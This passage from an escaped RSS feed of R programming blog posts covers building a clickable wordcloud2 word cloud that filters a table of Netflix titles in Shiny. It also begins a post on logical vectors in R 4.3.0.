&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 147 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then we just need to pass this word count data frame into the
&lt;code&gt;wordcloud2()&lt;/code&gt; function. We’re using a custom colour palette instead of
the default one. &lt;code&gt;wordcloud2()&lt;/code&gt; requires a colour palette vector of the
same length as the data set, so you can use the &lt;code&gt;rep_len()&lt;/code&gt; function to
achieve this.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;wordcloud2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_palette &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;#355070&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#6d597a&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#b56576&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#e56b6f&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#eaac8b&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_wordcloud &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;wordcloud2&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; word_counts,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep_len&lt;/span&gt;(my_palette,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(word_counts)))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="A word cloud generated by wordcloud2" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/wordcloud.png" width="1146"&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;wordcloud2&lt;/code&gt; package contains two functions for incorporating word
clouds in a Shiny app: &lt;code&gt;wordcloud2Output()&lt;/code&gt; and &lt;code&gt;renderWordcloud2()&lt;/code&gt;.
These work in the same way as most &lt;code&gt;*Output()&lt;/code&gt; and &lt;code&gt;render*()&lt;/code&gt;
functions.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;wordcloud2Output&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;wordcloud&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;wordcloud &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderWordcloud2&lt;/span&gt;(my_wordcloud)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="binding-a-javascript-click-event-to-a-shiny-input"&gt;Binding a JavaScript click event to a Shiny input&lt;/h3&gt;
&lt;p&gt;Now to the key part of this blog post. We want to be able to click on a
word in the word cloud, and use the clicked word as an input in Shiny.
We need to write some JavaScript for this, which will be wrapped in the
&lt;code&gt;HTML()&lt;/code&gt; function within a &lt;code&gt;script&lt;/code&gt; tag (&lt;code&gt;tags$script()&lt;/code&gt;). We are
writing an anonymous function, i.e. an unnamed function, which will be
run whenever we click on a word in the word cloud. The function will
extract the text content of the label produced when we hover over a
word, and then cast this to a Shiny input called &lt;code&gt;clicked_word&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;HTML&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;$(document).on(&amp;#39;click&amp;#39;, &amp;#39;#canvas&amp;#39;, function() {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; word = $(&amp;#39;#wcLabel&amp;#39;).text();
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; Shiny.onInputChange(&amp;#39;clicked_word&amp;#39;, word);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; });&amp;#34;&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;wordcloud2Output&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;wordcloud&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, we can use &lt;code&gt;input$clicked_word&lt;/code&gt; in our Shiny server to filter the
Netflix titles to retain only the titles which contain that specific
word. We use a combination of {dplyr} and
&lt;a href="https://stringr.tidyverse.org/" rel="external"&gt;{stringr}&lt;/a&gt; to do this. The input also
contains the count, e.g. “love: 151”, so we need to first use a regular
expression remove the colon and any numbers after it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;wordcloud &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderWordcloud2&lt;/span&gt;(my_wordcloud)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; filtered_netflix &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactive&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clicked_word &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;clicked_word, &lt;span style="color:#a5d6ff"&gt;&amp;#34;:[0-9]+$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; netflix_titles &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_detect&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tolower&lt;/span&gt;(title), clicked_word)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(title, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;everything&lt;/span&gt;(), &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;show_id)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The final step is to create an output table of the filtered data. We use
the &lt;code&gt;renderDT()&lt;/code&gt; and &lt;code&gt;DTOutput()&lt;/code&gt; functions from &lt;code&gt;{DT}&lt;/code&gt; to do this, but
you can use any package for creating tables.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;DT&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;DTOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;filtered_tbl&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;filtered_tbl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderDT&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filtered_netflix&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="Table of netflix titles filtered by clicking word in word\ncloud" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/filtered_table.png" width="1248"&gt;&lt;/p&gt;
&lt;p&gt;Now, you should have an interactive word cloud input which allows you to
filter a table based on whichever word you click! You can of course use
the word input for something else, for example, you could re-render the
word cloud every time you click a word to show you the words which are
most often used together with your clicked word, or you could use the
input to create some further visualisations.&lt;/p&gt;
&lt;p&gt;If you’re interested in learning more about Shiny, check out our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny
in Production&lt;/a&gt;
conference, taking place October 12th-13th in Newcastle upon Tyne. We’ll
be focussing on all things shiny as well as other web-based R packages,
with an afternoon of workshops run by our JR trainers, followed by a day
of talks from R experts!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What's new in R 4.3.0?</title><link>https://www.jumpingrivers.com/blog/whats-new-r43/</link><pubDate>Thu, 20 Apr 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/whats-new-r43/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r43/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/whats-new-r43/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Logic will get you from A to B. Imagination will you take everywhere.
(Einstein)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;R can already take you everywhere. With it we can learn about the
minutest particles and the largest galaxies. So, to celebrate the
release of R 4.3 (“Already Tomorrow”, on April 21st, 2023), let’s
reverse Einstein’s quote and take you from A to B with logic.&lt;/p&gt;
&lt;h3 id="two-modes-of-comparison"&gt;Two modes of comparison&lt;/h3&gt;
&lt;!--- Compare &amp;&amp; with &amp; --&gt;
&lt;p&gt;In R, almost all of your data will be stored as a vector. Even if your
vector holds a single value it is still considered to be a vector by R.
This is unlike many other languages, and getting comfortable “thinking
for the whole vector” can gain you efficiencies from several viewpoints.
Your code will be more concise and it may even run quicker, when
compared with an iterative approach to the same problem.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# A vector of integers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 1 2 3 4 5 6 7 8 9 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.vector&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# A vectorised computation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 55&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;integer&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# An empty vector of integers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## integer(0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1L&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# A single integer, stored as a vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;!--- Example 1:10 is a vector; 1 is a vector --&gt;
&lt;!--- Example x = 1:10; x + 1 vs x = 1:10; y &lt;- sapply(function(z) z + 1, x) --&gt;
&lt;p&gt;But the conciseness that R’s vectorised operations provide may trip you
up unexpectedly. A typical case is when you &lt;em&gt;think&lt;/em&gt; you are working with
a &lt;em&gt;scalar&lt;/em&gt; (a length-1 vector) but you are actually working with an
empty or multivalued vector.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;logical&lt;/code&gt; values in R (&lt;code&gt;TRUE&lt;/code&gt;, &lt;code&gt;FALSE&lt;/code&gt;) are a little bit special. A
vector of logical values might be used to represent some quality in a
dataset, for example, to select those rows of a dataset that are to be
kept in &lt;code&gt;dplyr::filter()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(diamonds)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 × 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## carat cut color clarity depth table price x y z&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;dbl&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 0.23 Ideal E SI2 61.5 55 326 3.95 3.98 2.43&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 0.21 Premium E SI1 59.8 61 326 3.89 3.84 2.31&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 0.23 Good E VS1 56.9 65 327 4.05 4.07 2.31&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 0.29 Premium I VS2 62.4 58 334 4.2 4.23 2.63&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 0.31 Good J SI2 63.3 58 335 4.34 4.35 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 0.24 Very Good J VVS2 62.8 57 336 3.94 3.96 2.48&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(diamonds&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;cut &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Ideal&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# A logical vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE FALSE FALSE FALSE FALSE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(diamonds, cut &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Ideal&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Subsetting a data-frame using a logical vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 21,551 × 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## carat cut color clarity depth table price x y z&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;dbl&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 0.23 Ideal E SI2 61.5 55 326 3.95 3.98 2.43&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 0.23 Ideal J VS1 62.8 56 340 3.93 3.9 2.46&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 0.31 Ideal J SI2 62.2 54 344 4.35 4.37 2.71&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 0.3 Ideal I SI2 62 54 348 4.31 4.34 2.68&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 0.33 Ideal I SI2 61.8 55 403 4.49 4.51 2.78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 0.33 Ideal I SI2 61.2 56 403 4.49 4.5 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 0.33 Ideal J SI1 61.1 56 403 4.49 4.55 2.76&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 0.23 Ideal G VS1 61.9 54 404 3.93 3.95 2.44&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 0.32 Ideal I SI1 60.9 55 404 4.45 4.48 2.72&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 0.3 Ideal I SI2 61 59 405 4.3 4.33 2.63&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 21,541 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
